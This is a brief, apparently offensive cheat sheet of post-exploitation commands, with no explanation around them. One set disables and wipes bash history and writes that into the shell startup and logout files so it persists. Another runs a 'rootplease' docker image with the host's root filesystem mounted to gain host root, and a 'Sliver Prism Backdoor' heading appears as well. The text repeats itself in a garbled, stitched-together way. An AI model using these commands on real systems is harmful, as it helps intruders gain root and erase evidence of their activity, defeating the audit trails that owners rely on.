Bash History
unset HISTFILE
history -c
echo "unset HISTFILE" >> ~/.bash_profile; echo "unset HISTFILE" >> ~/.bashrc
echo 'history -c' >> ~/.bash_logout
Docker
docker run -v /:/hostOS -it --rm chrisfosterelli/rootplease
Sliver Prism Backdoor
unset HISTFILE
history -c
echo "unset HISTFILE" >> ~/.bash_profile; echo "unset HISTFILE" >> ~/.bashrc
echo 'history -c' >> ~/.bash_logout
docker run -v /:/hostOS -it --rm chrisfosterelli/rootplease
Sliver Prism Backdoor